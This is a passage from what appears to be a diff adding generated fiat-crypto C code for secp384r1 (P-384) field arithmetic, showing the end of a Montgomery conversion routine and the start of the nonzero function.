uint64_t x13; ++ uint64_t x14; ++ uint64_t x15; ++ fiat_secp384r1_uint1 x16; ++ uint64_t x17; ++ fiat_secp384r1_uint1 x18; ++ uint64_t x19; ++ fiat_secp384r1_uint1 x20; ++ uint64_t x21; ++ fiat_secp384r1_uint1 x22; ++ uint64_t x23; ++ uint64_t x24; ++ uint64_t x25; ++ uint64_t x26; ++ uint64_t x27; ++ uint64_t x28; ++ uint64_t x29; ++ uint64_t x30; ++ uint64_t x31; ++ uint64_t x32; ++ uint64_t x33; ++ uint64_t x34; ++ uint64_t x35; ++ uint64_t x36; ++ uint64_t x37; ++ fiat_secp384r1_uint1 x38; ++ uint64_t x39; ++ fiat_secp384r1_uint1 x40; ++ uint64_t x41; ++ fiat_secp384r1_uint1 x42; ++ uint64_t x43; ++ fiat_secp384r1_uint1 x44; ++ uint64_t x45; ++ fiat_secp384r1_uint1 x46; ++ uint64_t x47; ++ fiat_secp384r1_uint1 x48; ++ uint64_t x49; ++ fiat_secp384r1_uint1 x50; ++ uint64_t x51; ++ fiat_secp384r1_uint1 x52; ++ uint64_t x53; ++ fiat_secp384r1_uint1 x54; ++ uint64_t x55; ++ fiat_secp384r1_uint1 x56; ++ uint64_t x57; ++ fiat_secp384r1_uint1 x58; ++ uint64_t x59; ++ fiat_secp384r1_uint1 x60; ++ uint64_t x61; ++ uint64_t x62; ++ uint64_t x63; ++ uint64_t x64; ++ uint64_t x65; ++ uint64_t x66; ++ uint64_t x67; ++ uint64_t x68; ++ uint64_t x69; ++ fiat_secp384r1_uint1 x70; ++ uint64_t x71; ++ fiat_secp384r1_uint1 x72; ++ uint64_t x73; ++ fiat_secp384r1_uint1 x74; ++ uint64_t x75; ++ fiat_secp384r1_uint1 x76; ++ uint64_t x77; ++ fiat_secp384r1_uint1 x78; ++ uint64_t x79; ++ fiat_secp384r1_uint1 x80; ++ uint64_t x81; ++ fiat_secp384r1_uint1 x82; ++ uint64_t x83; ++ fiat_secp384r1_uint1 x84; ++ uint64_t x85; ++ fiat_secp384r1_uint1 x86; ++ uint64_t x87; ++ fiat_secp384r1_uint1 x88; ++ uint64_t x89; ++ uint64_t x90; ++ uint64_t x91; ++ uint64_t x92; ++ uint64_t x93; ++ uint64_t x94; ++ uint64_t x95; ++ uint64_t x96; ++ uint64_t x97; ++ uint64_t x98; ++ uint64_t x99; ++ uint64_t x100; ++ uint64_t x101; ++ uint64_t x102; ++ uint64_t x103; ++ fiat_secp384r1_uint1 x104; ++ uint64_t x105; ++ fiat_secp384r1_uint1 x106; ++ uint64_t x107; ++ fiat_secp384r1_uint1 x108; ++ uint64_t x109; ++ fiat_secp384r1_uint1 x110; ++ uint64_t x111; ++ fiat_secp384r1_uint1 x112; ++ uint64_t x113; ++ fiat_secp384r1_uint1 x114; ++ uint64_t x115; ++ fiat_secp384r1_uint1 x116; ++ uint64_t x117; ++ fiat_secp384r1_uint1 x118; ++ uint64_t x119; ++ fiat_secp384r1_uint1 x120; ++ uint64_t x121; ++ fiat_secp384r1_uint1 x122; ++ uint64_t x123; ++ fiat_secp384r1_uint1 x124; ++ uint64_t x125; ++ fiat_secp384r1_uint1 x126; ++ uint64_t x127; ++ uint64_t x128; ++ uint64_t x129; ++ uint64_t x130; ++ uint64_t x131; ++ uint64_t x132; ++ uint64_t x133; ++ uint64_t x134; ++ uint64_t x135; ++ fiat_secp384r1_uint1 x136; ++ uint64_t x137; ++ fiat_secp384r1_uint1 x138; ++ uint64_t x139; ++ fiat_secp384r1_uint1 x140; ++ uint64_t x141; ++ fiat_secp384r1_uint1 x142; ++ uint64_t x143; ++ fiat_secp384r1_uint1 x144; ++ uint64_t x145; ++ fiat_secp384r1_uint1 x146; ++ uint64_t x147; ++ fiat_secp384r1_uint1 x148; ++ uint64_t x149; ++ fiat_secp384r1_uint1 x150; ++ uint64_t x151; ++ fiat_secp384r1_uint1 x152; ++ uint64_t x153; ++ fiat_secp384r1_uint1 x154; ++ uint64_t x155; ++ uint64_t x156; ++ uint64_t x157; ++ uint64_t x158; ++ uint64_t x159; ++ uint64_t x160; ++ uint64_t x161; ++ uint64_t x162; ++ uint64_t x163; ++ uint64_t x164; ++ uint64_t x165; ++ uint64_t x166; ++ uint64_t x167; ++ uint64_t x168; ++ uint64_t x169; ++ fiat_secp384r1_uint1 x170; ++ uint64_t x171; ++ fiat_secp384r1_uint1 x172; ++ uint64_t x173; ++ fiat_secp384r1_uint1 x174; ++ uint64_t x175; ++ fiat_secp384r1_uint1 x176; ++ uint64_t x177; ++ fiat_secp384r1_uint1 x178; ++ uint64_t x179; ++ fiat_secp384r1_uint1 x180; ++ uint64_t x181; ++ fiat_secp384r1_uint1 x182; ++ uint64_t x183; ++ fiat_secp384r1_uint1 x184; ++ uint64_t x185; ++ fiat_secp384r1_uint1 x186; ++ uint64_t x187; ++ fiat_secp384r1_uint1 x188; ++ uint64_t x189; ++ fiat_secp384r1_uint1 x190; ++ uint64_t x191; ++ fiat_secp384r1_uint1 x192; ++ uint64_t x193; ++ uint64_t x194; ++ uint64_t x195; ++ uint64_t x196; ++ uint64_t x197; ++ uint64_t x198; ++ uint64_t x199; ++ uint64_t x200; ++ uint64_t x201; ++ fiat_secp384r1_uint1 x202; ++ uint64_t x203; ++ fiat_secp384r1_uint1 x204; ++ uint64_t x205; ++ fiat_secp384r1_uint1 x206; ++ uint64_t x207; ++ fiat_secp384r1_uint1 x208; ++ uint64_t x209; ++ fiat_secp384r1_uint1 x210; ++ uint64_t x211; ++ fiat_secp384r1_uint1 x212; ++ uint64_t x213; ++ fiat_secp384r1_uint1 x214; ++ uint64_t x215; ++ fiat_secp384r1_uint1 x216; ++ uint64_t x217; ++ fiat_secp384r1_uint1 x218; ++ uint64_t x219; ++ fiat_secp384r1_uint1 x220; ++ uint64_t x221; ++ uint64_t x222; ++ uint64_t x223; ++ uint64_t x224; ++ uint64_t x225; ++ uint64_t x226; ++ uint64_t x227; ++ uint64_t x228; ++ uint64_t x229; ++ uint64_t x230; ++ uint64_t x231; ++ uint64_t x232; ++ uint64_t x233; ++ uint64_t x234; ++ uint64_t x235; ++ fiat_secp384r1_uint1 x236; ++ uint64_t x237; ++ fiat_secp384r1_uint1 x238; ++ uint64_t x239; ++ fiat_secp384r1_uint1 x240; ++ uint64_t x241; ++ fiat_secp384r1_uint1 x242; ++ uint64_t x243; ++ fiat_secp384r1_uint1 x244; ++ uint64_t x245; ++ fiat_secp384r1_uint1 x246; ++ uint64_t x247; ++ fiat_secp384r1_uint1 x248; ++ uint64_t x249; ++ fiat_secp384r1_uint1 x250; ++ uint64_t x251; ++ fiat_secp384r1_uint1 x252; ++ uint64_t x253; ++ fiat_secp384r1_uint1 x254; ++ uint64_t x255; ++ fiat_secp384r1_uint1 x256; ++ uint64_t x257; ++ fiat_secp384r1_uint1 x258; ++ uint64_t x259; ++ uint64_t x260; ++ uint64_t x261; ++ uint64_t x262; ++ uint64_t x263; ++ uint64_t x264; ++ uint64_t x265; ++ uint64_t x266; ++ uint64_t x267; ++ fiat_secp384r1_uint1 x268; ++ uint64_t x269; ++ fiat_secp384r1_uint1 x270; ++ uint64_t x271; ++ fiat_secp384r1_uint1 x272; ++ uint64_t x273; ++ fiat_secp384r1_uint1 x274; ++ uint64_t x275; ++ fiat_secp384r1_uint1 x276; ++ uint64_t x277; ++ fiat_secp384r1_uint1 x278; ++ uint64_t x279; ++ fiat_secp384r1_uint1 x280; ++ uint64_t x281; ++ fiat_secp384r1_uint1 x282; ++ uint64_t x283; ++ fiat_secp384r1_uint1 x284; ++ uint64_t x285; ++ fiat_secp384r1_uint1 x286; ++ uint64_t x287; ++ uint64_t x288; ++ uint64_t x289; ++ uint64_t x290; ++ uint64_t x291; ++ uint64_t x292; ++ uint64_t x293; ++ uint64_t x294; ++ uint64_t x295; ++ uint64_t x296; ++ uint64_t x297; ++ uint64_t x298; ++ uint64_t x299; ++ uint64_t x300; ++ uint64_t x301; ++ fiat_secp384r1_uint1 x302; ++ uint64_t x303; ++ fiat_secp384r1_uint1 x304; ++ uint64_t x305; ++ fiat_secp384r1_uint1 x306; ++ uint64_t x307; ++ fiat_secp384r1_uint1 x308; ++ uint64_t x309; ++ fiat_secp384r1_uint1 x310; ++ uint64_t x311; ++ fiat_secp384r1_uint1 x312; ++ uint64_t x313; ++ fiat_secp384r1_uint1 x314; ++ uint64_t x315; ++ fiat_secp384r1_uint1 x316; ++ uint64_t x317; ++ fiat_secp384r1_uint1 x318; ++ uint64_t x319; ++ fiat_secp384r1_uint1 x320; ++ uint64_t x321; ++ fiat_secp384r1_uint1 x322; ++ uint64_t x323; ++ fiat_secp384r1_uint1 x324; ++ uint64_t x325; ++ uint64_t x326; ++ uint64_t x327; ++ uint64_t x328; ++ uint64_t x329; ++ uint64_t x330; ++ uint64_t x331; ++ uint64_t x332; ++ uint64_t x333; ++ fiat_secp384r1_uint1 x334; ++ uint64_t x335; ++ fiat_secp384r1_uint1 x336; ++ uint64_t x337; ++ fiat_secp384r1_uint1 x338; ++ uint64_t x339; ++ fiat_secp384r1_uint1 x340; ++ uint64_t x341; ++ fiat_secp384r1_uint1 x342; ++ uint64_t x343; ++ fiat_secp384r1_uint1 x344; ++ uint64_t x345; ++ fiat_secp384r1_uint1 x346; ++ uint64_t x347; ++ fiat_secp384r1_uint1 x348; ++ uint64_t x349; ++ fiat_secp384r1_uint1 x350; ++ uint64_t x351; ++ fiat_secp384r1_uint1 x352; ++ uint64_t x353; ++ uint64_t x354; ++ uint64_t x355; ++ uint64_t x356; ++ uint64_t x357; ++ uint64_t x358; ++ uint64_t x359; ++ uint64_t x360; ++ uint64_t x361; ++ uint64_t x362; ++ uint64_t x363; ++ uint64_t x364; ++ uint64_t x365; ++ uint64_t x366; ++ uint64_t x367; ++ fiat_secp384r1_uint1 x368; ++ uint64_t x369; ++ fiat_secp384r1_uint1 x370; ++ uint64_t x371; ++ fiat_secp384r1_uint1 x372; ++ uint64_t x373; ++ fiat_secp384r1_uint1 x374; ++ uint64_t x375; ++ fiat_secp384r1_uint1 x376; ++ uint64_t x377; ++ fiat_secp384r1_uint1 x378; ++ uint64_t x379; ++ fiat_secp384r1_uint1 x380; ++ uint64_t x381; ++ fiat_secp384r1_uint1 x382; ++ uint64_t x383; ++ fiat_secp384r1_uint1 x384; ++ uint64_t x385; ++ fiat_secp384r1_uint1 x386; ++ uint64_t x387; ++ fiat_secp384r1_uint1 x388; ++ uint64_t x389; ++ fiat_secp384r1_uint1 x390; ++ uint64_t x391; ++ fiat_secp384r1_uint1 x392; ++ uint64_t x393; ++ fiat_secp384r1_uint1 x394; ++ uint64_t x395; ++ fiat_secp384r1_uint1 x396; ++ uint64_t x397; ++ fiat_secp384r1_uint1 x398; ++ uint64_t x399; ++ fiat_secp384r1_uint1 x400; ++ uint64_t x401; ++ fiat_secp384r1_uint1 x402; ++ uint64_t x403; ++ fiat_secp384r1_uint1 x404; ++ uint64_t x405; ++ uint64_t x406; ++ uint64_t x407; ++ uint64_t x408; ++ uint64_t x409; ++ uint64_t x410; ++ x1 = (arg1[1]); ++ x2 = (arg1[2]); ++ x3 = (arg1[3]); ++ x4 = (arg1[4]); ++ x5 = (arg1[5]); ++ x6 = (arg1[0]); ++ fiat_secp384r1_mulx_u64(&x7, &x8, x6, UINT64_C(0x200000000)); ++ fiat_secp384r1_mulx_u64(&x9, &x10, x6, UINT64_C(0xfffffffe00000000)); ++ fiat_secp384r1_mulx_u64(&x11, &x12, x6, UINT64_C(0x200000000)); ++ fiat_secp384r1_mulx_u64(&x13, &x14, x6, UINT64_C(0xfffffffe00000001)); ++ fiat_secp384r1_addcarryx_u64(&x15, &x16, 0x0, x14, x11); ++ fiat_secp384r1_addcarryx_u64(&x17, &x18, x16, x12, x9); ++ fiat_secp384r1_addcarryx_u64(&x19, &x20, x18, x10, x7); ++ fiat_secp384r1_addcarryx_u64(&x21, &x22, x20, x8, x6); ++ fiat_secp384r1_mulx_u64(&x23, &x24, x13, UINT64_C(0x100000001)); ++ fiat_secp384r1_mulx_u64(&x25, &x26, x23, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x27, &x28, x23, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x29, &x30, x23, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x31, &x32, x23, UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_mulx_u64(&x33, &x34, x23, UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_mulx_u64(&x35, &x36, x23, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u64(&x37, &x38, 0x0, x36, x33); ++ fiat_secp384r1_addcarryx_u64(&x39, &x40, x38, x34, x31); ++ fiat_secp384r1_addcarryx_u64(&x41, &x42, x40, x32, x29); ++ fiat_secp384r1_addcarryx_u64(&x43, &x44, x42, x30, x27); ++ fiat_secp384r1_addcarryx_u64(&x45, &x46, x44, x28, x25); ++ fiat_secp384r1_addcarryx_u64(&x47, &x48, 0x0, x13, x35); ++ fiat_secp384r1_addcarryx_u64(&x49, &x50, x48, x15, x37); ++ fiat_secp384r1_addcarryx_u64(&x51, &x52, x50, x17, x39); ++ fiat_secp384r1_addcarryx_u64(&x53, &x54, x52, x19, x41); ++ fiat_secp384r1_addcarryx_u64(&x55, &x56, x54, x21, x43); ++ fiat_secp384r1_addcarryx_u64(&x57, &x58, x56, x22, x45); ++ fiat_secp384r1_addcarryx_u64(&x59, &x60, x58, 0x0, (x46 + x26)); ++ fiat_secp384r1_mulx_u64(&x61, &x62, x1, UINT64_C(0x200000000)); ++ fiat_secp384r1_mulx_u64(&x63, &x64, x1, UINT64_C(0xfffffffe00000000)); ++ fiat_secp384r1_mulx_u64(&x65, &x66, x1, UINT64_C(0x200000000)); ++ fiat_secp384r1_mulx_u64(&x67, &x68, x1, UINT64_C(0xfffffffe00000001)); ++ fiat_secp384r1_addcarryx_u64(&x69, &x70, 0x0, x68, x65); ++ fiat_secp384r1_addcarryx_u64(&x71, &x72, x70, x66, x63); ++ fiat_secp384r1_addcarryx_u64(&x73, &x74, x72, x64, x61); ++ fiat_secp384r1_addcarryx_u64(&x75, &x76, x74, x62, x1); ++ fiat_secp384r1_addcarryx_u64(&x77, &x78, 0x0, x49, x67); ++ fiat_secp384r1_addcarryx_u64(&x79, &x80, x78, x51, x69); ++ fiat_secp384r1_addcarryx_u64(&x81, &x82, x80, x53, x71); ++ fiat_secp384r1_addcarryx_u64(&x83, &x84, x82, x55, x73); ++ fiat_secp384r1_addcarryx_u64(&x85, &x86, x84, x57, x75); ++ fiat_secp384r1_addcarryx_u64(&x87, &x88, x86, x59, x76); ++ fiat_secp384r1_mulx_u64(&x89, &x90, x77, UINT64_C(0x100000001)); ++ fiat_secp384r1_mulx_u64(&x91, &x92, x89, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x93, &x94, x89, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x95, &x96, x89, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x97, &x98, x89, UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_mulx_u64(&x99, &x100, x89, UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_mulx_u64(&x101, &x102, x89, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u64(&x103, &x104, 0x0, x102, x99); ++ fiat_secp384r1_addcarryx_u64(&x105, &x106, x104, x100, x97); ++ fiat_secp384r1_addcarryx_u64(&x107, &x108, x106, x98, x95); ++ fiat_secp384r1_addcarryx_u64(&x109, &x110, x108, x96, x93); ++ fiat_secp384r1_addcarryx_u64(&x111, &x112, x110, x94, x91); ++ fiat_secp384r1_addcarryx_u64(&x113, &x114, 0x0, x77, x101); ++ fiat_secp384r1_addcarryx_u64(&x115, &x116, x114, x79, x103); ++ fiat_secp384r1_addcarryx_u64(&x117, &x118, x116, x81, x105); ++ fiat_secp384r1_addcarryx_u64(&x119, &x120, x118, x83, x107); ++ fiat_secp384r1_addcarryx_u64(&x121, &x122, x120, x85, x109); ++ fiat_secp384r1_addcarryx_u64(&x123, &x124, x122, x87, x111); ++ fiat_secp384r1_addcarryx_u64(&x125, &x126, x124, ((uint64_t)x88 + x60), ++ (x112 + x92)); ++ fiat_secp384r1_mulx_u64(&x127, &x128, x2, UINT64_C(0x200000000)); ++ fiat_secp384r1_mulx_u64(&x129, &x130, x2, UINT64_C(0xfffffffe00000000)); ++ fiat_secp384r1_mulx_u64(&x131, &x132, x2, UINT64_C(0x200000000)); ++ fiat_secp384r1_mulx_u64(&x133, &x134, x2, UINT64_C(0xfffffffe00000001)); ++ fiat_secp384r1_addcarryx_u64(&x135, &x136, 0x0, x134, x131); ++ fiat_secp384r1_addcarryx_u64(&x137, &x138, x136, x132, x129); ++ fiat_secp384r1_addcarryx_u64(&x139, &x140, x138, x130, x127); ++ fiat_secp384r1_addcarryx_u64(&x141, &x142, x140, x128, x2); ++ fiat_secp384r1_addcarryx_u64(&x143, &x144, 0x0, x115, x133); ++ fiat_secp384r1_addcarryx_u64(&x145, &x146, x144, x117, x135); ++ fiat_secp384r1_addcarryx_u64(&x147, &x148, x146, x119, x137); ++ fiat_secp384r1_addcarryx_u64(&x149, &x150, x148, x121, x139); ++ fiat_secp384r1_addcarryx_u64(&x151, &x152, x150, x123, x141); ++ fiat_secp384r1_addcarryx_u64(&x153, &x154, x152, x125, x142); ++ fiat_secp384r1_mulx_u64(&x155, &x156, x143, UINT64_C(0x100000001)); ++ fiat_secp384r1_mulx_u64(&x157, &x158, x155, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x159, &x160, x155, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x161, &x162, x155, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x163, &x164, x155, UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_mulx_u64(&x165, &x166, x155, UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_mulx_u64(&x167, &x168, x155, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u64(&x169, &x170, 0x0, x168, x165); ++ fiat_secp384r1_addcarryx_u64(&x171, &x172, x170, x166, x163); ++ fiat_secp384r1_addcarryx_u64(&x173, &x174, x172, x164, x161); ++ fiat_secp384r1_addcarryx_u64(&x175, &x176, x174, x162, x159); ++ fiat_secp384r1_addcarryx_u64(&x177, &x178, x176, x160, x157); ++ fiat_secp384r1_addcarryx_u64(&x179, &x180, 0x0, x143, x167); ++ fiat_secp384r1_addcarryx_u64(&x181, &x182, x180, x145, x169); ++ fiat_secp384r1_addcarryx_u64(&x183, &x184, x182, x147, x171); ++ fiat_secp384r1_addcarryx_u64(&x185, &x186, x184, x149, x173); ++ fiat_secp384r1_addcarryx_u64(&x187, &x188, x186, x151, x175); ++ fiat_secp384r1_addcarryx_u64(&x189, &x190, x188, x153, x177); ++ fiat_secp384r1_addcarryx_u64(&x191, &x192, x190, ((uint64_t)x154 + x126), ++ (x178 + x158)); ++ fiat_secp384r1_mulx_u64(&x193, &x194, x3, UINT64_C(0x200000000)); ++ fiat_secp384r1_mulx_u64(&x195, &x196, x3, UINT64_C(0xfffffffe00000000)); ++ fiat_secp384r1_mulx_u64(&x197, &x198, x3, UINT64_C(0x200000000)); ++ fiat_secp384r1_mulx_u64(&x199, &x200, x3, UINT64_C(0xfffffffe00000001)); ++ fiat_secp384r1_addcarryx_u64(&x201, &x202, 0x0, x200, x197); ++ fiat_secp384r1_addcarryx_u64(&x203, &x204, x202, x198, x195); ++ fiat_secp384r1_addcarryx_u64(&x205, &x206, x204, x196, x193); ++ fiat_secp384r1_addcarryx_u64(&x207, &x208, x206, x194, x3); ++ fiat_secp384r1_addcarryx_u64(&x209, &x210, 0x0, x181, x199); ++ fiat_secp384r1_addcarryx_u64(&x211, &x212, x210, x183, x201); ++ fiat_secp384r1_addcarryx_u64(&x213, &x214, x212, x185, x203); ++ fiat_secp384r1_addcarryx_u64(&x215, &x216, x214, x187, x205); ++ fiat_secp384r1_addcarryx_u64(&x217, &x218, x216, x189, x207); ++ fiat_secp384r1_addcarryx_u64(&x219, &x220, x218, x191, x208); ++ fiat_secp384r1_mulx_u64(&x221, &x222, x209, UINT64_C(0x100000001)); ++ fiat_secp384r1_mulx_u64(&x223, &x224, x221, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x225, &x226, x221, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x227, &x228, x221, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x229, &x230, x221, UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_mulx_u64(&x231, &x232, x221, UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_mulx_u64(&x233, &x234, x221, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u64(&x235, &x236, 0x0, x234, x231); ++ fiat_secp384r1_addcarryx_u64(&x237, &x238, x236, x232, x229); ++ fiat_secp384r1_addcarryx_u64(&x239, &x240, x238, x230, x227); ++ fiat_secp384r1_addcarryx_u64(&x241, &x242, x240, x228, x225); ++ fiat_secp384r1_addcarryx_u64(&x243, &x244, x242, x226, x223); ++ fiat_secp384r1_addcarryx_u64(&x245, &x246, 0x0, x209, x233); ++ fiat_secp384r1_addcarryx_u64(&x247, &x248, x246, x211, x235); ++ fiat_secp384r1_addcarryx_u64(&x249, &x250, x248, x213, x237); ++ fiat_secp384r1_addcarryx_u64(&x251, &x252, x250, x215, x239); ++ fiat_secp384r1_addcarryx_u64(&x253, &x254, x252, x217, x241); ++ fiat_secp384r1_addcarryx_u64(&x255, &x256, x254, x219, x243); ++ fiat_secp384r1_addcarryx_u64(&x257, &x258, x256, ((uint64_t)x220 + x192), ++ (x244 + x224)); ++ fiat_secp384r1_mulx_u64(&x259, &x260, x4, UINT64_C(0x200000000)); ++ fiat_secp384r1_mulx_u64(&x261, &x262, x4, UINT64_C(0xfffffffe00000000)); ++ fiat_secp384r1_mulx_u64(&x263, &x264, x4, UINT64_C(0x200000000)); ++ fiat_secp384r1_mulx_u64(&x265, &x266, x4, UINT64_C(0xfffffffe00000001)); ++ fiat_secp384r1_addcarryx_u64(&x267, &x268, 0x0, x266, x263); ++ fiat_secp384r1_addcarryx_u64(&x269, &x270, x268, x264, x261); ++ fiat_secp384r1_addcarryx_u64(&x271, &x272, x270, x262, x259); ++ fiat_secp384r1_addcarryx_u64(&x273, &x274, x272, x260, x4); ++ fiat_secp384r1_addcarryx_u64(&x275, &x276, 0x0, x247, x265); ++ fiat_secp384r1_addcarryx_u64(&x277, &x278, x276, x249, x267); ++ fiat_secp384r1_addcarryx_u64(&x279, &x280, x278, x251, x269); ++ fiat_secp384r1_addcarryx_u64(&x281, &x282, x280, x253, x271); ++ fiat_secp384r1_addcarryx_u64(&x283, &x284, x282, x255, x273); ++ fiat_secp384r1_addcarryx_u64(&x285, &x286, x284, x257, x274); ++ fiat_secp384r1_mulx_u64(&x287, &x288, x275, UINT64_C(0x100000001)); ++ fiat_secp384r1_mulx_u64(&x289, &x290, x287, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x291, &x292, x287, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x293, &x294, x287, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x295, &x296, x287, UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_mulx_u64(&x297, &x298, x287, UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_mulx_u64(&x299, &x300, x287, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u64(&x301, &x302, 0x0, x300, x297); ++ fiat_secp384r1_addcarryx_u64(&x303, &x304, x302, x298, x295); ++ fiat_secp384r1_addcarryx_u64(&x305, &x306, x304, x296, x293); ++ fiat_secp384r1_addcarryx_u64(&x307, &x308, x306, x294, x291); ++ fiat_secp384r1_addcarryx_u64(&x309, &x310, x308, x292, x289); ++ fiat_secp384r1_addcarryx_u64(&x311, &x312, 0x0, x275, x299); ++ fiat_secp384r1_addcarryx_u64(&x313, &x314, x312, x277, x301); ++ fiat_secp384r1_addcarryx_u64(&x315, &x316, x314, x279, x303); ++ fiat_secp384r1_addcarryx_u64(&x317, &x318, x316, x281, x305); ++ fiat_secp384r1_addcarryx_u64(&x319, &x320, x318, x283, x307); ++ fiat_secp384r1_addcarryx_u64(&x321, &x322, x320, x285, x309); ++ fiat_secp384r1_addcarryx_u64(&x323, &x324, x322, ((uint64_t)x286 + x258), ++ (x310 + x290)); ++ fiat_secp384r1_mulx_u64(&x325, &x326, x5, UINT64_C(0x200000000)); ++ fiat_secp384r1_mulx_u64(&x327, &x328, x5, UINT64_C(0xfffffffe00000000)); ++ fiat_secp384r1_mulx_u64(&x329, &x330, x5, UINT64_C(0x200000000)); ++ fiat_secp384r1_mulx_u64(&x331, &x332, x5, UINT64_C(0xfffffffe00000001)); ++ fiat_secp384r1_addcarryx_u64(&x333, &x334, 0x0, x332, x329); ++ fiat_secp384r1_addcarryx_u64(&x335, &x336, x334, x330, x327); ++ fiat_secp384r1_addcarryx_u64(&x337, &x338, x336, x328, x325); ++ fiat_secp384r1_addcarryx_u64(&x339, &x340, x338, x326, x5); ++ fiat_secp384r1_addcarryx_u64(&x341, &x342, 0x0, x313, x331); ++ fiat_secp384r1_addcarryx_u64(&x343, &x344, x342, x315, x333); ++ fiat_secp384r1_addcarryx_u64(&x345, &x346, x344, x317, x335); ++ fiat_secp384r1_addcarryx_u64(&x347, &x348, x346, x319, x337); ++ fiat_secp384r1_addcarryx_u64(&x349, &x350, x348, x321, x339); ++ fiat_secp384r1_addcarryx_u64(&x351, &x352, x350, x323, x340); ++ fiat_secp384r1_mulx_u64(&x353, &x354, x341, UINT64_C(0x100000001)); ++ fiat_secp384r1_mulx_u64(&x355, &x356, x353, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x357, &x358, x353, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x359, &x360, x353, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x361, &x362, x353, UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_mulx_u64(&x363, &x364, x353, UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_mulx_u64(&x365, &x366, x353, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u64(&x367, &x368, 0x0, x366, x363); ++ fiat_secp384r1_addcarryx_u64(&x369, &x370, x368, x364, x361); ++ fiat_secp384r1_addcarryx_u64(&x371, &x372, x370, x362, x359); ++ fiat_secp384r1_addcarryx_u64(&x373, &x374, x372, x360, x357); ++ fiat_secp384r1_addcarryx_u64(&x375, &x376, x374, x358, x355); ++ fiat_secp384r1_addcarryx_u64(&x377, &x378, 0x0, x341, x365); ++ fiat_secp384r1_addcarryx_u64(&x379, &x380, x378, x343, x367); ++ fiat_secp384r1_addcarryx_u64(&x381, &x382, x380, x345, x369); ++ fiat_secp384r1_addcarryx_u64(&x383, &x384, x382, x347, x371); ++ fiat_secp384r1_addcarryx_u64(&x385, &x386, x384, x349, x373); ++ fiat_secp384r1_addcarryx_u64(&x387, &x388, x386, x351, x375); ++ fiat_secp384r1_addcarryx_u64(&x389, &x390, x388, ((uint64_t)x352 + x324), ++ (x376 + x356)); ++ fiat_secp384r1_subborrowx_u64(&x391, &x392, 0x0, x379, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u64(&x393, &x394, x392, x381, ++ UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_subborrowx_u64(&x395, &x396, x394, x383, ++ UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_subborrowx_u64(&x397, &x398, x396, x385, ++ UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_subborrowx_u64(&x399, &x400, x398, x387, ++ UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_subborrowx_u64(&x401, &x402, x400, x389, ++ UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_subborrowx_u64(&x403, &x404, x402, x390, 0x0); ++ fiat_secp384r1_cmovznz_u64(&x405, x404, x391, x379); ++ fiat_secp384r1_cmovznz_u64(&x406, x404, x393, x381); ++ fiat_secp384r1_cmovznz_u64(&x407, x404, x395, x383); ++ fiat_secp384r1_cmovznz_u64(&x408, x404, x397, x385); ++ fiat_secp384r1_cmovznz_u64(&x409, x404, x399, x387); ++ fiat_secp384r1_cmovznz_u64(&x410, x404, x401, x389); ++ out1[0] = x405; ++ out1[1] = x406; ++ out1[2] = x407; ++ out1[3] = x408; ++ out1[4] = x409; ++ out1[5] = x410; ++} ++ ++/* ++ * The function fiat_secp384r1_nonzero outputs a single non-zero word if the input is non-zero and zero otherwise. ++ * Preconditions: ++ * 0 ≤ eval arg1 < m ++ * Postconditions: ++ * out1 = 0 ↔ eval (from_montgomery arg1) mod m = 0 ++ * ++ * Input Bounds: ++ * arg1: [[0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff]] ++ * Output Bounds: ++ * out1: [0x0 ~> 0xffffffffffffffff] ++ */ ++static void ++fiat_secp384r1_nonzero(uint64_t *out1, const uint64_t arg1[6]) ++{ ++ uint64_t x1; ++ x1 = ((arg1[0]) | ++ ((arg1[1]) | ++ 